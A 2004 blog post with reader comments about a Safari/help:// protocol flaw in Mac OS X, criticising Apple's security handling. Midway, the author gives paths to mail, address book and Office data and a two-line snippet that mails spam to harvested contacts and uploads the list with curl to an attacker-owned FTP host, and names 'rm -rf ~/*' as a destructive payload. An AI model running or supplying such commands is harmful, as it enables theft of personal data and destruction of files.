Recognizing a warning shot

I've gotten mail about the new security exploit going around for MacOS X, either to give me a heads up on it, or to ask my thoughts on it... which is kind of odd, but cool too...

Interesting things happens when your blog goes from averaging 1k uniq's/month to 130k+/month, and that's after you remove the bots or stuff I mirror. It's gone way down from the peak, but it's still way up there from what it was, with thousands of uniq's pulling down my .rdf file in their newsreader of choice.

I can go through some of the others another time, but the one that's pertinent to this post is that your time to decide what to blog about gets cut way, way down, as people start telling you what they'd like you to write about. It certainly makes things simpler, but does make you feel as though you should be using a spell checker.

If you haven't followed, there's been some security buzz of late going on in the OSX world. Much of it by the mainstays of the mac community has been... kinda blown off. Either saying "it's a feature, not a bug" regarding something like the DHCP vulnerability, or conspiracy theories regarding whether or not a certain company actually created the vulnerability. There's also been a trojan that doesn't touch on any of them floating around the file-sharing services claiming to be Office2004...

...this particular exploit is much more general, and involves the help:// protocol built into MacOS X, which can be exploited by Safari. Basically if you go to a site that exploits this, Safari passes the commands onto the help viewer, which will run whatever you tell it to. It's very, very reminiscent of older IE for Windows exploits.

To break it down, my thoughts are six-fold:

It's a big, big deal
Extremely serious. Most of the things out right now are simple proof-of-concepts, but don't kid yourself, this is nasty, and while there have been several nasty holes found recently, the barrier to entry to creating something really nasty and hurting a grandma is severely decreased.

Someone could well post a link to something malicious in the comments to this post and you'd be screwed. And it's making the rounds, big time. We aren't even talking about something complex enough to warrant needing a mac for testing... anyone who looks at the vulnerability, checks out the test case and knows the command rm -rf ~/* is your worst nightmare.

Part of me is glad for it, there are Apple users out there who feel immune, and act as such, and click everything that comes their way and pretty much tell others to do the same. They consider it a bragging right. They've joined the rest of the computing world now in having to be careful about where they go, just not as careful.

Mac users: you're going to get freaked by this, and be tempted to right it off. Don't do that, you'll just look foolish. Don't cry chicken little, but this is the real deal.
It could be worse
It's not a self-propagating worm at this point. And outside of being a root-exploitable default service, it's about as bad as it could get. Right now, the ways this is being used are pretty simplistic.

But don't kid yourself... with a lot more brain power applied, this could get real bad, real fast. I wouldn't be surprised if someone is writing up a curl script to push this to hundreds of forums or mailing lists.
This is a security versus convenience thing
There's a fine line that every OS maker has to contend with. Security is a trade-off. The more secure something is, the more inconvenient it will be. There are lots of people saying "Apple had to do this, otherwise installing software would be too hard for people".

There validity to that, in that its convenient and increases usability. I've even been grateful for it before. But there's a certain other OS vendor who has gone down this path before, and is getting harangued because of it.
There's nothing magical about Mac OSX
Those who think Macs are magically more secure than other systems really need to take a gut-check with this. Apple is ahead of the game in that the guts they build on are open source, fairly well tested, and takes security seriously from the start. But you have to remember that this is OSX's base, not the whole deal.

As people are starting to turn a security eye to OSX they aren't finding fault with the *nix base so much as with what Apple bolts on. Anything they add is fair game, untested, and possibly exploitable. Just because it's based on *nix does not give it inherent security, it just raises the bar, which can be lowered through what's bolted on top of it.
Disappointed
I'm not so much disappointed in that it happened, but rather at Apple's handling of security matters yet again. The finder of the exploit claims he told Apple about it in February, and finally came forward after being ignored. To those whose opinions I care about, Apple is gaining mindshare as a company who downplays security problems in the name of PR and is uncommunicative to security researchers. They need to change that story.

In the past, the mac crowd has gone after these guys as though they were lying about when they told Apple... lay off. I can't speak for certainty on this one, but I know its happened in the past. There is no patch, although there are fixes available. And Apple has just given their canned response, and people are saying "I hope they fix it soon".
Using a low-visibility platform has its benefits
Those who think Apples minority status doesn't save their ass need to treat this as a shot across the bow, and wake up to the fact that this is the kind of hole where, if it was on Windows, would have been the cause of tens of thousands of PCs being infected with spy/malware.

The last seems to cause the most contention, and often when someone says something like "Macs are low-visibility, which is why they don't have viruses" they are blasted by the mac faithful like you wouldn't believe. I'm not quite sure where it comes from, but while it isn't the whole story, there's definite truth to it.

It's all about opportunity costs. Here's an example:

Some of the most prevalent malware lately have been the equivalent of an encrypted .dmg file emailed to a user, which they then have to save to disk, run, enter a password, double-click a wrapped shell script & they're lunch.

In some ways doing this on something like 10.3 would be _easier_ than on current versions of windows as many of the viruses now carry along their own lil smtp engine because it really isn't that easy to script stuff going straight out through Outlook anymore.

I whipped up a silly-proof-of-concept of this pretty easily, which I checked to make sure would work, and then deleted it straight quick. But to give you an idea, once you've trawled things like:

~/Library/Mail/
~/Library/Application\ Support/AddressBook
~/Documents/Microsoft\ User\ Data/Office\ X\ Identities/

...etc...

Your money shot can be as simple as something like:

mail -s "$spamsubject" "$spamlist" < $messagebodies;
curl -T $path2spamlist ftp://$remoteOwnedHost$remotePath -u $remoteOwnedUser:$remotePass

You're talking all of 10 minutes really to get some of the most damning functionality even with someone of limited skillz. And I'm just talking about harvesting for spam... doing a locate for Quicken files or .docs or .xls would be just as easy, but it was just to give you an idea.

Hell, the ease of coding on the mac would allow you to create a more feature-laden, less buggy social virus in half the time... ;)

But stop and think about it... there's no real bang-for-buck in doing it for the mac, you have a drastically lessened field of possible hosts to spread to. This includes not only mac machines, but happening to get that one person who will download the virus and actually do it. Sure it'll get lucky here and there, but will quickly quickly peter out... once it gets a little ways.

The same will happen to this... sure, one could throw up a geocities page with lots of mac-related content, let it get googled and then wait and see how many mac users you snare... but we're talking paltry stuff. Sheer numbers mean that if you're using a 5-year old Windows IE exploit you'll have 100 times the exploited users in 1/100th of the time.

Which isn't to downplay the danger of this current exploit in any way. If I were a real bastard, and you hadn't applied the fixes, and were reading this on a 10.3 machine, the above could be running on your machine as you read this, and sending me all your private goodies.

The subject is kind of tiring at this point, and I've pretty much shot my load. Apple is crunching some spreadsheet showing them that their current status quo makes sense, and doesn't seem to realize they're missing a variable in their equation.

Posted by drunkenbatman
May 20, 2004, at 11:23 PM

Comments ⁽⁹⁾

Posted by: William at May 21, 2004 06:16 AM

I am sure Apple will have a patch for this soon, Apple has a good record as a whole for patching. I do wonder what the holdup on the patch is, maybe they are waiting to include it in 10.3.4?

To patch my macs I am using DGTGF. It seems to work none of my macs show up as vulnerable now.

Posted by: Jason Choa at May 21, 2004 07:56 AM

Stop scaremongering! This is not that a "big, big deal", or it would be patched. Show one has come forth saying they have lost data from this & until they do this is all just entertaining theory.

Posted by: apex at May 21, 2004 09:30 AM

Way to go asshole, why don't you write half the virus for them. Oh wait, you DID.

Posted by: M at May 21, 2004 11:07 AM

Lighten up Apex, we're past the point where a four-lines of sample code matter.

Speaking of, does anyone know if the script kiddies on Windows ever realized that code could be used to name files (like virii/worms) and emails (like re your last message)?

Back on topic, I've always hated Safari (Mosaic is dead and long gone, move on) and especially 'internet enabled' dmgs. So I sort of lucked into being nearly immune to this in the first place.

Posted by: iGeek at May 21, 2004 04:01 PM

I'm growing tired of most of the "mac web". Why aren't any of the other mac sites taking Apple to task for this?

The double standards they hold Apple to are so tired. They just won't talk about stuff like this, you have to go to eweek or something not mac-related!

At least this time they don't seem to be bashing the people saying it is a problem. I stopped reading daring fireball when they said the DHCP vulnerability was not a problem and anyone who said it was clueless.

Anyways, good job again.

Posted by: iGeek at May 22, 2004 04:35 PM

Apple has released a security update yesterday (it is dated wrong?) but it doesn't fix really fix it.

There are least 6 different ways for this to be exploited. ftp://, webdav:// & others. I would think with two months they would have fixed the root cause and not just a symptom.

Posted by: Timothy at May 23, 2004 04:29 PM

This is getting worse and Apples patch only stops one. You can now just make up a handler protocol to exploit which makes it exponential, not 6.

I am using paranoid android from unsanity, but it seems like a temporary fix at best. It is scary when the rest of the community is having to release these fixes, and not Apple.

Posted by: at May 23, 2004 08:13 PM

For some of the newer 'holes' there is not a lot Apple can do to solve potential problems without seriously impacting the end user's way of working.

They will probably put more steps along the way before damage can be done but even that won't help some users who seem to think they are never going to get hit by any of these issues. Some people will double-click anything even if it came from some far off P2P IP. But as far as stuff happening without the user knowing, mechanisms can be put in place to enhance security.

The internet and all its associated protocols etc is the biggest threat to users. I'd personally go for some blanket protection scheme as well as tightening up what can happen without a user knowing.

Stuff like making file deletion undoable (Deep Freeze-like qualites). Creating a 'safe' browsing environment for users. 'Safe' in the sense that whatever happens during an internet session is summarised and reported to the user before becoming final. Basically the same kind of functionality/security that a new non-admin user would afford your average web surfer but without the need to create the user, or maintaining separate file destinations etc and done with Apple ease of use in mind. A simple on/off button and plain English descriptions.

etc, etc. I don't have time to expand on these suggestions right now.

Posted by: drunkenbatman at May 24, 2004 02:56 PM

Anon guy said >> For some of the newer 'holes' there is not a lot Apple can do to solve potential problems without seriously impacting the end user's way of working.

You raise a good point, except that I'd take a different tact than you by saying if thats how it is, the user shouldn't be working that way. Yes its convenient, but we've been down the convenience of security route before with ActiveX and Microsoft.

I'd much rather remove the functionality and have to work in a different way, rather than wait while Apple plays whack-a-mole for the next 5 years due to the problems.

DrunkenBlog